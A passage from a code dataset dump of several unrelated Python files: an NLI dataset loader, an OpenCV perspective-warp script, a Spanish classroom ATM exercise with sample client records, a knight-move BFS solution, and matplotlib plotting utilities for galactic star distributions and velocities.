getUnbatchedDataset(trainDataSet, modelName, maxLength=64):\n \n if type(trainDataSet) == list:\n trainDataSet = {k: None for k in trainDataSet}\n \n trainDataSet = {k: v for k, v in trainDataSet.items() if k in raw_ds_mapping} \n \n tokenizer = transformers.AutoTokenizer.from_pretrained(modelName, use_fast=True)\n \n # This is a list of generators\n raw_datasets = [get_raw_dataset(x) for x in trainDataSet]\n \n nb_examples = 0\n\n labels = [] \n sentence_pairs = []\n \n for name in trainDataSet:\n raw_ds = get_raw_dataset(name)\n nb_examples_to_use = raw_ds_mapping[name][2]\n \n if trainDataSet[name]:\n nb_examples_to_use = 
min(trainDataSet[name], nb_examples_to_use)\n \n nb_examples += nb_examples_to_use\n \n n = 0\n \n for x in raw_ds:\n sentence_pairs.append((x['premise'], x['hypothesis']))\n labels.append(x['label'])\n n += 1\n if n >= nb_examples_to_use:\n break\n\n # `transformers.tokenization_utils_base.BatchEncoding` object -> `dict`\n r = dict(tokenizer.batch_encode_plus(batch_text_or_text_pairs = sentence_pairs, max_length = maxLength, padding = 'max_length', truncation = True))\n\n # This is very slow\n dataset = tf.data.Dataset.from_tensor_slices((r, labels))\n\n return dataset, nb_examples\n\n\ndef getBatchedTrainingDataset(dataset, nb_examples, batch_size = 16, shuffle_buffer_size = None, repeat = False):\n \n if repeat:\n dataset = dataset.repeat()\n \n if not shuffle_buffer_size:\n shuffle_buffer_size = nb_examples\n\n dataset = dataset.shuffle(shuffle_buffer_size)\n \n dataset = dataset.batch(batch_size, drop_remainder=True)\n \n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n \n return dataset\n\n\ndef getPredictionDataset(dataset, batch_size = 16):\n dataset = dataset.batch(batch_size, drop_remainder=False)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n \n return dataset\n","repo_name":"MortarDefender/NLP-Recognizing-Textual-Entailment","sub_path":"src/dataSetUtils.py","file_name":"dataSetUtils.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}{"seq_id":"32711820893","text":"\"\"\"\r\nWARP: extract the OBJECT from an image using a perspective transform\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nimg = cv2.imread('card.jpeg')\r\nwidth, height = 250, 350\r\npts1 = np.float32([[234, 60], [341, 53], [254, 213], [367, 203]])\r\npts2 = np.float32([[0, 0], [width, 0], [0, height], [width, height]])\r\n\r\nmatrix = cv2.getPerspectiveTransform(pts1, pts2)\r\nimgOutput = cv2.warpPerspective(img, matrix, (width, height))\r\ncv2.imshow('card Image', img)\r\ncv2.imshow('card Output', imgOutput)\r\ncv2.waitKey(0)\r\n\r\n","repo_name":"Franky-Saxena/Face-Recognition-OPENCV","sub_path":"warp.py","file_name":"warp.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}{"seq_id":"5840316056","text":"\nclass Cliente:\n User = [\n [4386265817658813,\"Marcos Antonio\",2578,10000.00,\"001-0482267-5\",\"Los Molinos, Sto. Do. Este\",\"05/07/1999\"],\n [4706622888055985,\"José Hernández\",9314,45000.00,\"038-3215463-8\",\"Alma rosa I, Sto. Do. Este\",\"03/11/1995\"],\n [4894380501711011,\"Diego Peralta\",2427,150000.00,\"402-1933423-7\",\"Los Mameyes, Sto. Do. Este\",\"12/08/2002\"],\n [4134586712345568,\"Elvis Guillermo\",2427,300.00,\"402-2257713-1\",\"Manoguayabo, Sto. Do. 
Sur\",\"31/12/2001\"]]\n cuenta_suspendidas = [User[0],User[3]]\n\nclientes = Cliente.User\nsuspendidas = Cliente.cuenta_suspendidas\n#----------------------------------------------------------------------------------------------------------\ndef info():\n print(\"\\n----------------------------------------------\\n\")\n print(\"Codigo usuario =\", clientes.index(usuario))\n print(\"Cuenta:\",usuario[0])\n print(\"Balance:\",usuario[3])\n print(\"Nombre:\",usuario[1])\n print(\"Cedula:\",usuario[4])\n print(\"Direccion:\",usuario[5])\n print(\"Fecha de nacimiento:\",usuario[6])\n#----------------------------------------------------------------------------------------------------------\ndef informacion_cuenta():\n if not usuario in suspendidas:\n info()\n else:\n info()\n#----------------------------------------------------------------------------------------------------------\ndef depositar():\n monto = float(input(\"\\nDigite el monto a depositar: \"))\n usuario[3] += monto\n print(\"\\nSu nuevo balance es: \")\n print(usuario[3])\n#---------------------------------------------------------------------------------------------------------- \ndef retirar():\n monto = float(input(\"\\nDigite el monto a retirar: \"))\n if monto > usuario[3]:\n print(\"\\nNo tienes fondos suficientes\")\n else:\n print(\"\\nMonto retirado: \",monto)\n usuario[3]= usuario[3] - monto\n print(\"\\nSu nuevo balance es: \")\n print(usuario[3]) \n#----------------------------------------------------------------------------------------------------------\ndef Banco():\n global usuario\n error = 0\n print(\"\\n-----------------------------------------------------------------\")\n print (\"\\n..:Bienvenido al banco internacional YourMoneyISafe\")\n \n while True: \n cuenta = int(input(\"\\nIngrese el numero de su targeta o (0 PARA FINALIZAR):\"))\n if not cuenta == 0:\n for k in range (len(clientes)):\n if cuenta == clientes[k][0]:\n contraseña = int(input(\"\\nIngrese su contraseña:\"))\n if contraseña == clientes[k][2]:\n print(\"\\n--------------------------------------------\")\n print(\"| Bienvenido \", clientes[k][1],\" |\")\n print(\"|__________________________________________|\")\n print(\"| 1. Informacion de la cuenta |\")\n print(\"| 2. Deposito |\")\n print(\"| 3. Retiro de efectivo |\")\n print(\"| 4. 
Cancelar |\")\n print(\"--------------------------------------------\\n\")\n opcion = int(input(\"\\nDigite su opción: \"))\n if not opcion <1 and cuenta >4:\n if opcion == 1:\n usuario = clientes[k]\n informacion_cuenta()\n if opcion == 2:\n usuario = clientes[k]\n if not usuario in suspendidas:\n depositar()\n break;\n else: \n print(\"\\n Lo sentimos, su cuenta esta inhabilitada por favor acuda al centro de atencion mas cercano\")\n if opcion == 3:\n usuario = clientes[k]\n if not usuario in suspendidas:\n retirar()\n break;\n else: \n print(\"\\n Lo sentimos, su cuenta esta inhabilitada por favor acuda al centro de atencion mas cercano\") \n if opcion == 4:\n print(\"Has finalizado el programa\")\n break;\n else:\n print(\"no has ingresado ninguna de las opciones\")\n else: \n print(\"\\nContraseña incorrecta\")\n break; \n elif cuenta != clientes[0][0] and cuenta != clientes[1][0] and cuenta != clientes[2][0] :\n error +=1\n if error == 4:\n print(\"no hay cuenta asociada a ese codigo\")\n error = 0 \n if cuenta == 0:\n print(\"Has finalizado el programa\")\n break;\n\nBanco()","repo_name":"10GO-dev/Intro_Programacion","sub_path":"Ejercicio_en_clase_para_hoy.py","file_name":"Ejercicio_en_clase_para_hoy.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70438946322","text":"from collections import deque\n\nkDirection = [[-1, -2], [-2, -1], [-2, 1], [-1, 2], [1, 2], [2, 1], [2, -1], [1, -2]]\n\ndef BFS(startX, startY, endX, endY, visited):\n que = deque()\n que.append([startX, startY, 0])\n visited[startX][startY] = 1\n while que:\n cx, cy, cc = que.popleft()\n if cx == endX and cy == endY:\n print(cc)\n break\n for i in range(len(kDirection)):\n nx = cx + kDirection[i][0]\n ny = cy + kDirection[i][1]\n if -1 < nx < L and -1 < ny < L and visited[nx][ny] == 0:\n visited[nx][ny] = 1\n que.append([nx, ny, cc + 1])\n\nN = int(input())\n\nfor _ in range(N):\n L = int(input())\n visited = [[0] * L for _ in range(L)]\n x, y = map(int, input().split())\n targetX, targetY = map(int, input().split())\n BFS(x, y, targetX, targetY, visited)","repo_name":"tomxoghks789/pyAlgo","sub_path":"BFS/나이트의 이동.py","file_name":"나이트의 이동.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32200422372","text":"from matplotlib.ticker import FormatStrFormatter\nfrom matplotlib.ticker import StrMethodFormatter\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport matplotlib.cm as cm\nimport numpy as np\nimport astropy\nimport pandas as pd\nfrom data_analysis import generate_vector_mesh\nfrom astropy.visualization import LogStretch\nfrom astropy.visualization.mpl_normalize import ImageNormalize\n\n'''\nA simple histogram displaying the distribution of entries along the galactic plane.\nInput parameters:\n galcen - SkyCoord object in galactocentric frame\n'''\ndef distribution_hist(galcen):\n\n fig = plt.figure(figsize=(10, 10))\n\n plt.hist(-galcen.x.value, bins=np.linspace(-10000, 10000, 32))\n plt.xlabel('$x$ [{0:latex_inline}]'.format(galcen.z.unit), fontdict={'fontsize': 18});\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n plt.ylabel('Count', fontdict={'fontsize': 18});\n plt.grid()\n plt.rcParams[\"patch.force_edgecolor\"] = True\n plt.title(\"Distribution by Distance\", pad=20, fontdict={'fontsize': 20})\n\n 
plt.show()\n\n'''\nA 2D histogram to depict point source density in different regions using 2D bins.\nUsing this to replace the currently broken 'point_density' plot.\n\n'''\ndef point_density_histogram(galcen, vmax, bin_start = -16000, bin_end = 16000, n_bins = 200):\n\n # Check if data is in DataFrame or Astropy SkyCoords object\n if isinstance(galcen, pd.DataFrame):\n x_coord = [-x for x in galcen.x]\n y_coord = [y for y in galcen.y]\n else:\n x_coord = [-x for x in galcen.x.value]\n y_coord = [y for y in galcen.y.value]\n\n norm_hist2d = ImageNormalize(vmin=0., vmax=vmax, stretch=LogStretch())\n\n fig = plt.figure(figsize=(10, 10))\n\n plt.hist2d(x_coord, y_coord, bins=np.linspace(bin_start, bin_end, n_bins), norm = norm_hist2d)\n\n plt.xlabel('x [pc]', fontsize=15)\n plt.ylabel('y [pc]', fontsize=15)\n plt.title(\"2D Histograms of Data Sources\", pad=20, fontdict={'fontsize': 20})\n plt.xlim(bin_start, bin_end)\n plt.ylim(bin_start, bin_end)\n plt.grid()\n\n cbar = plt.colorbar()\n cbar.ax.set_ylabel('Number of stars in bin')\n\n plt.show()\n\ndef display_values(XX, YY, H, mode = None):\n \"\"\"A function that displays the specific numerical values inside each bin.\n\n Args:\n XX (array): Bin boundaries in the x-axis.\n YY (array): Bin boundaries in the y-axis.\n H (asarray): The values inside the bins.\n mode (str, optional): The statistic used in the bin. Defaults to None.\n \"\"\"\n\n\n for i in range(YY.shape[0]-1):\n for j in range(XX.shape[1]-1):\n\n if mode != 'count':\n txt = plt.text((XX[0][j+1] + XX[0][j])/2, (YY.T[0][i+1] + YY.T[0][i])/2, '%.2f' % H.T[i, j],\n horizontalalignment='center',\n verticalalignment='center',\n backgroundcolor='w')\n\n else:\n txt = plt.text((XX[0][j+1] + XX[0][j])/2, (YY.T[0][i+1] + YY.T[0][i])/2, '%.0f' % H.T[i, j],\n horizontalalignment='center',\n verticalalignment='center', backgroundcolor='w')\n\n'''\nA plot which enables the user to see the bins created by the 'bin_data' functions in the\ndata analysis module. It takes in the histogram data and does a colormesh with colours\nmapped to the value inside the 2D bin.\n'''\ndef display_bins(bin_collection, projection_parameter, mode = 'mean', showBinValues = True):\n\n parameter = projection_parameter\n\n XX, YY = bin_collection.bin_boundaries[0:2]\n\n values = bin_collection.CalculateValues(parameter, mode)\n\n fig = plt.figure(figsize = (10,10))\n ax1=plt.subplot(111)\n plot1 = ax1.pcolormesh(XX, YY, values.T)\n\n if(showBinValues):\n display_values(XX, YY, values)\n\n cbar = plt.colorbar(plot1,ax=ax1,\n pad = .015,\n aspect=10,\n label='2D Bins Velocity V{0}[{1}]'.format(parameter, 'km/s'))\n\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n ax1.set_xlabel('$x$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 18})\n ax1.set_ylabel('$y$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 18})\n\n plt.title(\"2D Bins Velocity V{0}\".format(parameter), pad=20, fontdict={'fontsize': 20})\n\n plt.show()\n\n\n\ndef plot_collapsed_bins(bin_collection, projection_parameter, showBinValues = True, mode = 'mean'):\n \"\"\"A plot to display the bins collapsed along the angular position coordinate phi.\n\n Args:\n bin_collection (BinCollection obj): Generated BinCollectino object.\n projection_parameter (str): The physical parameter to be observed.\n showBinValues (bool, optional): Shows numerical values in bins. 
Defaults to True.\n mode (str, optional): The statistic used on the parameter. Defaults to 'mean'.\n \"\"\"\n\n parameter = projection_parameter\n\n XX, YY = bin_collection.bin_boundaries[0:2]\n\n values = bin_collection.CalculateValues(parameter, mode = mode)\n\n if values.dtype == 'object':\n values = values.astype('float64')\n\n fig = plt.figure(figsize = (20,10))\n ax1=plt.subplot(111)\n plot1 = ax1.pcolormesh(XX,YY,values.T)\n\n if(showBinValues):\n display_values(XX, YY, values, mode)\n\n # Fix unit displaying later on!\n #cbar = plt.colorbar(plot1,ax=ax1,\n #pad = .015,\n #aspect=20,\n #label='R-Z Bins {0} [{1}]'.format(parameter, 'a.u.'))\n\n\n if(mode == 'MLE_std' or mode == 'MLE_mu'):\n projection_parameter = 'v_phi'\n\n cbar = plt.colorbar(plot1,ax=ax1,\n pad = .015,\n aspect = 20,\n label = '{0} {1}'.format(projection_parameter, mode))\n\n plt.xticks(XX[0])\n plt.yticks(YY.T[0])\n\n\n #plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n #plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n #ax1.set_xlabel('$r$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 18})\n #ax1.set_ylabel('$z$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 18})\n\n\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(3,3))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(3,3))\n\n ax1.set_xlabel('r [pc]' , fontdict={'fontsize': 18})\n ax1.set_ylabel('z [pc]', fontdict={'fontsize': 18})\n\n\n plt.title(\"Collapsed Bins in r-z Plane\", pad=20, fontdict={'fontsize': 20})\n\n arrowed_spines(fig, ax1)\n plt.show()\n\n\ndef Velocity_Field_Imshow(bin_collection,\n title_string = \"\",\n arg_notes=\"\",\n interpolation_type = \"gaussian\",\n radii = [0],\n display_arrows = False,\n plot_circles=False,\n save = False):\n \"\"\"Creates a velocity heatmap from binned data\n\n Args:\n bin_collection (BinCollection): Binned data returned from the 'bin_data' function in 'data_analysis'\n title_string (str, optional): The title of the plot. Defaults to \"\".\n arg_notes (str, optional): Subtitle of the plot. Defaults to \"\".\n interpolation_type(str, optional): Set the interpolation of the bin values. Defaults to \"gaussian\".\n radii (list, optional): A list of concentric circle radii which is plotted if 'plot_circles' is set to True. Defaults to [0].\n display_arrows (bool, optional): If True, plots the velocity vector in each bin. Defaults to False.\n plot_circles (bool, optional): If True, plots concentric circles around the Galactic centre. Defaults to False.\n save (bool, optional): If True, saves the figure to disk in '.png' using the 'title_string' as the file name. 
Defaults to False.\n \"\"\"\n\n\n H = bin_collection.CalculateValues('v_x')\n H2 = bin_collection.CalculateValues('v_y')\n\n XX = bin_collection.bin_boundaries[0]\n YY = bin_collection.bin_boundaries[1]\n\n\n\n\n # Gets the vector coordinates\n VEC_XX, VEC_YY = generate_vector_mesh(bin_collection.bin_boundaries[0], bin_collection.bin_boundaries[1])\n\n fig, ax = plt.subplots(figsize = (10,10))\n ax.set_xlabel(r'$x$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 15}, labelpad = 25)\n ax.set_ylabel(r'$y$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 15}, labelpad = 25)\n\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n # Gives the hypotenuse of vectors\n M = np.hypot(H.T, H2.T)\n\n BIN_X_EDGES = bin_collection.bin_boundaries[0][0]\n BIN_Y_EDGES = bin_collection.bin_boundaries[1].T[0]\n\n dx = (BIN_X_EDGES[0]-BIN_X_EDGES[1])/2.\n dy = (BIN_Y_EDGES[0]-BIN_Y_EDGES[1])/2.\n extent = [BIN_X_EDGES[0], BIN_X_EDGES[-1], BIN_Y_EDGES[0], BIN_Y_EDGES[-1]]\n\n plt.xticks(XX[0])\n plt.yticks(YY.T[0])\n\n\n c = plt.imshow(M, extent = extent, interpolation = interpolation_type, cmap='jet')\n\n if(display_arrows):\n # The quiver plot with normalised vector lengths\n q = ax.quiver(VEC_XX, VEC_YY, H.T, H2.T, M, cmap=plt.cm.magma_r)\n\n\n ax.plot(0, 0, \"x\", color='red')\n ax.plot(-8178, 0, \"*\", markersize=20, color='red')\n\n plt.title(title_string, pad = 45, fontdict={'fontsize': 20})\n plt.suptitle(arg_notes, y=0.93, fontsize=15)\n\n cbar = plt.colorbar(c, ax=ax, pad = 0.05)\n cbar.set_label(label ='Velocity in bin [km/s]', labelpad= 30, size = 15)\n\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n\n # Plot Circles\n if(plot_circles):\n angle = np.linspace( 0 , 2 * np.pi , 150 )\n\n for i, radius in enumerate(radii):\n\n radius = radii[i]\n x = radius * np.cos( angle )\n y = radius * np.sin( angle )\n ax.plot( x, y , label='{0} pc'.format(radius))\n\n\n plt.legend(loc='upper left')\n plt.grid()\n\n current_cmap = mpl.cm.get_cmap('jet')\n print(current_cmap)\n current_cmap.set_bad(color='grey')\n\n if(save):\n plt.savefig(title_string +'.png', dpi=300, format='png')\n\n\n'''\nGenerates a velocity vector field from binned data.\nInput parameters:\n binned_dict - A dictionary containing all requisite data for displaying the vector field\n'''\ndef generate_velocity_vector_map(bin_collection):\n\n\n H = bin_collection.CalculateValues('v_x')\n H2 = bin_collection.CalculateValues('v_y')\n\n # Gets the vector coordinates\n VEC_XX, VEC_YY = generate_vector_mesh(bin_collection.bin_boundaries[0], bin_collection.bin_boundaries[1])\n\n fig, ax = plt.subplots(figsize = (7,7))\n\n # Gives the hypotenuse of vectors\n M = np.hypot(H.T, H2.T)\n\n norm = mpl.colors.Normalize()\n norm.autoscale(M)\n cm = mpl.cm.jet\n\n sm = mpl.cm.ScalarMappable(cmap=cm, norm=norm)\n sm.set_array([])\n\n # The quiver plot with normalised vector lengths\n q = ax.quiver(VEC_XX, VEC_YY, H.T, H2.T, M, cmap=plt.cm.jet)\n\n plt.colorbar(sm)\n\n # Formats x-y axis in scientific notation\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n # TODO: Implement for arbitrary limits\n plt.xlim(-20000,20000)\n plt.ylim(-20000,20000)\n\n ax.set_xlabel('$x$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), 
fontdict={'fontsize': 18})\n ax.set_ylabel('$y$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 18})\n\n plt.grid()\n plt.show()\n\n'''\ndf - Imported data from CSV\n'''\ndef run_parameter_tests(df, parameter_list):\n\n from .data_analysis import transform_to_galcen, get_transformed_data\n\n # Generating Transformation With Astropy\n galcen_astropy = transform_to_galcen(df)\n\n # Using our method\n galcen_my = get_transformed_data(df, include_cylindrical = True)\n\n\n for parameter in parameter_list:\n parameter_test_plot(galcen_astropy, galcen_my, parameter)\n\n\ndef parameter_test_plot(galcen_astropy, galcen_my, test_parameter):\n\n # Check if data is in DataFrame or Astropy SkyCoords object\n if isinstance(galcen_astropy, pd.DataFrame):\n x_coord = galcen_my[test_parameter]\n y_coord = galcen_astropy[test_parameter]\n else:\n x_coord = galcen_my[test_parameter]\n if(test_parameter == 'x'):\n y_coord = galcen_astropy.x.value\n\n elif(test_parameter == 'y'):\n y_coord = galcen_astropy.y.value\n\n elif(test_parameter == 'z'):\n y_coord = galcen_astropy.z.value\n\n elif(test_parameter == 'v_x'):\n y_coord = galcen_astropy.v_x.value\n\n elif(test_parameter == 'v_y'):\n y_coord = galcen_astropy.v_y.value\n\n elif(test_parameter == 'v_z'):\n y_coord = galcen_astropy.v_z.value\n\n\n # Right-hand transformation\n if(test_parameter == 'x' or test_parameter == 'v_x'):\n x_coord = [-x for x in x_coord]\n y_coord = [-y for y in y_coord]\n\n # Converstion to lists\n x_coord = [x for x in x_coord]\n y_coord = [y for y in y_coord]\n\n plot_label = \"Testing parameter: {0}\".format(test_parameter)\n\n plt.scatter(x_coord, y_coord, label=plot_label)\n plt.xlabel(\"Our values [{0}]\".format(test_parameter))\n plt.ylabel(\"Astropy values [{0}]\".format(test_parameter))\n plt.legend(loc='upper left')\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n plt.grid()\n plt.title(\"Our transformation VS Astropy\", pad=20, fontdict={'fontsize': 20})\n plt.show()\n\n# Displays arrows on plot\ndef arrowed_spines(fig, ax):\n\n xmin, xmax = ax.get_xlim()\n ymin, ymax = ax.get_ylim()\n\n ax.spines[\"left\"].set_position((\"data\", xmin))\n ax.spines[\"right\"].set_position((\"data\", xmax))\n\n # removing the default axis on all sides:\n for side in ['bottom','top']:\n ax.spines[side].set_visible(False)\n\n # get width and height of axes object to compute\n # matching arrowhead length and width\n dps = fig.dpi_scale_trans.inverted()\n bbox = ax.get_window_extent().transformed(dps)\n width, height = bbox.width, bbox.height\n\n # manual arrowhead width and length\n hw = 1./30.*(ymax-ymin)\n hl = 1./30.*(xmax-xmin)\n lw = 1 # axis line width\n ohg = 0 # arrow overhang\n\n # compute matching arrowhead length and width\n yhw = hw/(ymax-ymin)*(xmax-xmin)* height/width\n yhl = hl/(xmax-xmin)*(ymax-ymin)* width/height\n\n # draw x and y axis\n ax.arrow(xmin, 0., xmax-xmin, 0., fc='black', ec='black', lw = lw,\n head_width=hw, head_length=hl, overhang = ohg,\n length_includes_head= True, clip_on = False)\n\n ax.arrow(xmin, 0, 0., (ymax-ymin)/2, fc='k', ec='k', lw = lw,\n head_width=yhw, head_length=yhl, overhang = ohg,\n length_includes_head= True, clip_on = False)\n\n ax.arrow(xmin, 0, 0., (ymin-ymax)/2, fc='k', ec='k', lw = lw,\n head_width=yhw, head_length=yhl, overhang = ohg,\n length_includes_head= True, clip_on = False)\n\ndef display_polar_coordinates(phi, r):\n\n fig = plt.figure()\n ax = 
fig.add_subplot(111, projection='polar')\n c = ax.scatter(phi, r, cmap='hsv', alpha=0.5)\n\n plt.title(\"Polar Coordinates\", pad=20, fontdict={'fontsize': 20})\n plt.show()\n\n return fig\n\ndef display_polar_histogram(galcen_data, outpath, n_bins=100, norm_max = 1000, r_limits = (), title = \"Polar Plot\", is_save=True):\n \"\"\"A plot which displays a polar histogram of the stars in a galactocentric frame of reference.\n\n Args:\n galcen_data (Pandas DataFrame): The galactocentric data.\n n_bins (int, optional): Number of bins used in the plot. Defaults to 100.\n norm_max (int, optional): Colormap saturation limit for each bin. Defaults to 1000.\n r_limits (tuple, optional): Minimum and maximum edge of plotted area in r. If empty, it defaults to min, max r in data. Defaults to ().\n title (str, optional): The title string. Defaults to \"Polar Plot\".\n\n Returns:\n fig: The returned figure.\n \"\"\"\n from astropy.visualization.mpl_normalize import ImageNormalize\n from astropy.visualization import LogStretch\n\n fig= plt.figure(figsize=(10, 10), facecolor='white')\n\n # Init Data\n phi = galcen_data.phi\n r = galcen_data.r\n\n if not r_limits:\n min_r = np.min(galcen_data.r)\n max_r = np.max(galcen_data.r)\n else:\n min_r = r_limits[0]\n max_r = r_limits[1]\n\n plt.ylim(min_r, max_r)\n\n # Init Bins\n rbins = np.linspace(0, max_r, n_bins)\n abins = np.linspace(-np.pi,np.pi, n_bins)\n\n norm_hist2d = ImageNormalize(vmin=0., vmax=norm_max, stretch=LogStretch())\n\n ax = fig.add_subplot(111, projection='polar')\n plt.hist2d(phi, r, bins=(abins, rbins), norm = norm_hist2d)\n\n plt.title(title, pad=20, fontdict={'fontsize': 20})\n\n # Set r label background color to black\n plt.setp(ax.get_yticklabels(), backgroundcolor=\"black\")\n\n # Set r label font color to white\n ax.tick_params(axis=\"y\", colors=\"white\")\n\n # Configure angle labels\n ax.set_thetamin(360)\n ax.set_thetamax(0)\n\n cbar = plt.colorbar()\n cbar.ax.set_ylabel('Number of stars in bin')\n\n plt.grid()\n #plt.show()\n\n fig_name = '/sample_distribution_polar_coords'\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\ndef sample_distribution_galactic_coords(icrs_data, outpath, is_save = True):\n\n from astropy import units as u\n from astropy.coordinates import SkyCoord\n from matplotlib import colors\n\n c = SkyCoord(ra=list(icrs_data.ra)*u.degree, dec=list(icrs_data.dec)*u.degree, frame='icrs')\n\n fig = plt.figure(figsize=(16, 8))\n\n x = c.galactic.l.wrap_at(180*u.deg).to_value()\n y = c.galactic.b.wrap_at(180*u.deg).to_value()\n\n h = plt.hist2d(x, y, bins=250, cmin=50, norm=colors.PowerNorm(0.5), zorder=0.5)\n plt.scatter(x, y, alpha=0.05, s=1, color='k', zorder=0)\n\n fmt = mpl.ticker.ScalarFormatter(useMathText=True)\n fmt.set_powerlimits((0, 0))\n plt.colorbar(h[3], pad=0.02, format=fmt, orientation='vertical', label = 'Star density')\n\n plt.xlabel(r'$l$ [deg]', fontdict={'fontsize' : 16})\n plt.ylabel(r'$b$ [deg]', fontdict={'fontsize' : 16})\n\n plt.title(\"Sample Distribution in Galactic Coordinates\\n nstars = {}\".format(icrs_data.shape[0]), fontsize=18, pad=15)\n \n fig_name = '/sample_distribution_galactic_coords'\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\ndef plot_radial_distribution(sample, outpath, is_save=True):\n\n fig = plt.figure(figsize=(10, 10))\n\n fig.patch.set_facecolor('white')\n\n n_bins = 150\n r_min = 0\n r_max = np.max(sample.r_est)\n\n plt.hist(sample.r_est, 
bins=np.linspace(r_min, r_max, n_bins))\n\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n txt=\"{0} bins defined in the range [{1} - {2}] kpc\".format(n_bins, r_min, np.round(r_max))\n plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=12)\n\n plt.xlabel(r'$r$ (Heliocentric) [pc]', fontdict={'fontsize': 18}, labelpad = 20);\n plt.ylabel('Star count', fontdict={'fontsize': 18}, labelpad = 20);\n plt.xticks(fontsize=16)\n plt.yticks(fontsize=16)\n plt.grid()\n\n plt.rcParams[\"patch.force_edgecolor\"] = True\n plt.rc('font', **{'size':'16'})\n plt.title(\"Heliocentric Stellar Distances\\n nstars = {}\".format(sample.shape[0]), pad=20, fontdict={'fontsize': 20})\n\n fig_name = '/star_density_heliocentric_distribution'\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\ndef plot_distribution(sample, outpath, parameter, param_min, param_max, cutlines=None, is_save=True):\n \n fig, ax = plt.subplots(figsize=(10, 10))\n fig.patch.set_facecolor('white')\n\n n_bins = 150\n # param_min = -2000\n # param_max= 2000\n\n h = plt.hist(sample[parameter], bins=np.linspace(param_min, param_max, n_bins), alpha=1)\n\n #plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n txt=\"{0} bins defined in the range [{1} - {2}] pc\".format(n_bins, param_min, param_max)\n plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=12)\n\n plt.xlabel(r'${}$ [pc]'.format(parameter), fontdict={'fontsize': 18}, labelpad = 20);\n plt.ylabel('Star count', fontdict={'fontsize': 18}, labelpad = 20);\n plt.xticks(fontsize=16)\n plt.yticks(fontsize=16)\n plt.grid()\n\n plt.rcParams[\"patch.force_edgecolor\"] = True\n plt.rc('font', **{'size':'16'})\n\n plt.title(\"Star Density Histogram ({})\\n nstars = {}\".format(parameter, sample.shape[0]), pad=20, fontdict={'fontsize': 20})\n\n if(cutlines is not None):\n ax.vlines([cutlines[0], cutlines[1]], 0, np.max(h[0]), colors='yellow', linestyles='--')\n\n fig_name = '/star_density_{}_distribution'.format(parameter)\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\ndef plot_velocity_distribution(bins, outpath, is_range=False, plot_MU=False, is_save = True):\n\n if(len(bins) % np.sqrt(len(bins)) == 0):\n figs_x = round(np.sqrt(len(bins)))\n figs_y = figs_x\n else:\n figs_x = round(np.sqrt(len(bins)))\n figs_y = figs_x+1\n\n if(len(bins) > 5):\n figsize = 15\n else:\n figsize = 10\n\n fig, axs = plt.subplots(figs_y, figs_x, figsize = (figsize,figsize))\n\n for i, ax in enumerate(axs.flat):\n if(i < len(bins)):\n\n if(np.abs(np.min(bins[i].data.v_phi) - np.max(bins[i].data.v_phi)) > 500):\n n_bins = 80\n else:\n n_bins = 40\n\n z_range = bins[i].z_boundaries\n r_range = bins[i].r_boundaries\n\n text_string = \"$z \\in [{:.1f}, {:.1f}]$\\n$r \\in [{:.1f}, {:.1f}]$\".format(z_range[0], z_range[1], \n r_range[0], r_range[1])\n ax.text(0.75, 0.8,text_string, horizontalalignment='center',\n verticalalignment='center',\n transform = ax.transAxes, 